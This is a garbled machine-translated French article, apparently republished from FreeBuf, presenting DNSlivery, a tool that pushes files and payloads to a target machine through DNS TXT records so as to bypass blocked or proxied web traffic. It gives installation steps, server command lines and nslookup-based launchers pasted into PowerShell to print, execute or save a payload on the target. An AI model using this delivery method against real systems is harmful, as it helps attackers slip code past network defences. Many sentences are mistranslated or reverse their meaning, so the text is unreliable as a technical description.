projet DNSlivery permet dossier et livraison Payload à la cible via le protocole DNS. L'inspiration initiale pour ce projet provient des PowerDNS et Joff Thyer Paul a publié un podcast hebdomadaire de sécurité # 590 segments technologiques.

propriété

Il vous permet d'imprimer, d'exécuter ou enregistrer le fichier à la cible

Il ne nécessite pas de client sur la cible

Il ne nécessite pas de serveur DNS complet

DNSlivery peut facilement le fichier / charge utile à la machine cible, ainsi que l'installation et le fonctionnement de tout logiciel client spécial n'est pas nécessaire sur la cible, ce qui est un lieu de diffusion sur le Web ne peut pas être fait. Cela fonctionne bien pour le trafic Web sortant est interdit ou restreint l'environnement ne soit vérifié par un proxy réseau.

Encore plus complet des outils de tunnel DNS (comme dnscat2 et de l'iode) existent déjà, ils ont besoin pour exécuter un client dédié sur la cible. Le problème est que le DNS est pas possible de cette façon de fournir des environnements client limitées. En d'autres termes, l'utilisation de ces outils pour construire le canal désiré a été créé canal DNS DNS.

En revanche, DNSlivery communication à sens unique à partir du serveur vers la cible, mais ne nécessite pas de client spécifique pour effectuer cette opération. Donc, si vous avez besoin de construire canal bidirectionnel fiable par DNS, s'il vous plaît utiliser DNSlivery fournir un outils DNS plus avancés tunnel votre objectif.

travaux

Comme avec la plupart des outils, comme tunnel DNS, DNSlivery utilisation enregistrement TXT et stocker dans une représentation base64 du contenu du fichier. Cependant, il est nécessaire de fournir un serveur DNS complet, qui utilise la bibliothèque scapy pour écouter les paquets de données entrants et en réponse au DNS.

Comme la plupart fichier ne correspond pas à un enregistrement TXT unique, DnsLivery créera des enregistrements plus ordonnés contiennent morceau base64 du fichier. A titre d'exemple, la figure 42 illustre une première partie de la transmission du fichier nommé.

Afin de récupérer tout morceau de base64 les remettre ensemble sans qu'il soit nécessaire pour le client spécial sur la cible, DnsLivery généré pour chaque fichier:

Un lanceur de texte brut simple,

Un base64 fiable codé stager

processus de livraison nécessite deux étapes pour ajouter des fonctionnalités (réponse DNS manipulation S.A. manquante) stager, sinon ces caractéristiques ne rentre pas dans un seul enregistrement TXT.

A propos de cible Compatibilité

À l'heure actuelle, seule PowerShell. Cependant, il peut améliorer DNSlivery pour soutenir d'autres objectifs, tels que bash ou python. Si cela est que vous voulez atteindre la fonction, s'il vous plaît me dire @ no0be.

Exigences d'installation

DNSlivery nécessité de construire une architecture de serveur complexe. En fait, il vous suffit de répondre à deux exigences simples à:

La possibilité de créer des enregistrements NS dans votre zone DNS public

Avoir un peut recevoir udp / 53 serveurs Linux de trafic Internet

installer

Zone DNS

La première étape consiste à créer un nouveau record NS dans le domaine, sous-domaine délégué pour exécuter serveur DNSlivery. Par exemple, j'ai créé les documents suivants seront déléguées à un serveur dnsd.no0.be sous-domaine vps.no0.be.

DNSD IN NS vps.no0.be.

Si votre région par une tierce gestion des fournisseurs de parti, s'il vous plaît se référer à la documentation pour créer l'enregistrement NS.

DNSlivery

La seule exigence est exécutée DNSlivery python3 et bibliothèque scapy.

clone git https://github.com/no0be/DNSlivery.git && cd DNSlivery pip installer -r requirements.txt

utilisation

serveur

DNSlivery sera disponible pour tous les fichiers dans un répertoire donné (par défaut PWD), et doit être exécuté en tant que root afin d'écouter les udp entrants / 53 paquets.

utilisation: dnslivery.py Interface Domaine nameserver DNSlivery - fichiers facile et la livraison des charges utiles sur DNS arguments de position: l'interface interface pour écouter le trafic DNS domaine nom FQDN de la zone DNS Nom du serveur de noms de domaine complet du serveur DNSlivery en cours d'exécution arguments optionnels: -h, --help afficher ce message d'aide et de sortie PATH -p, chemin --path PATH du répertoire pour servir sur DNS (par défaut: PWD) -s SIZE, --size taille de taille en octets de morceaux de base64 (valeur par défaut: 255) -v, --verbose augmentation verbosité

exemple:

$ Sudo python3 dnslivery.py eth0 dnsd.no0.be vps.no0.be -p / tmp / dns-livraison DNSlivery - fichiers facile et la livraison des charges utiles sur DNS « Fichier » fichier prêt pour la livraison à file.dnsd.no0.be (7 morceaux) À l'écoute des requêtes DNS ...

À propos des noms de fichiers normalisation

Étant donné que le nom de domaine pour permettre ensemble de caractères plus restrictive (selon RFC1035) que le nom de fichier UNIX, donc DNSlivery la mise en uvre normalisée en cas de besoin.

exemple:

Fichier « My Awesome Powershell Script .ps1 « prêt pour la livraison à my-awesome-powershell-script----ps1.dnsd.no0.be (1891 morceaux)

Notez que le code normalisé actuel n'est pas parfait, car il ne considère pas le chevauchement de nom de fichier ou limite de taille.

cible

Sur la cible, il est d'abord recherché lanceur fichier désiré en demandant son enregistrement TXT dédié. Il prend en charge les trois lanceurs suivants:

Comportement lanceur Description Imprimer .print. ( Par défaut ) Pour transférer le fichier d'impression à la console .exec. Effectuer le transfert de fichiers (utile pour les scripts) sauvegarde .save. Enregistrez le transfert de fichiers sur le disque (utile pour les fichiers binaires)

nslookup -type = txt . .

Ensuite, copiez simplement la réponse DNS et lance cité le coller dans la console PowerShell pour récupérer des fichiers sur la cible.

exemple:

* Référence Source: GitHub, FB Xiao Bian secist compilé, Reproduit s'il vous plaît préciser de FreeBuf.COM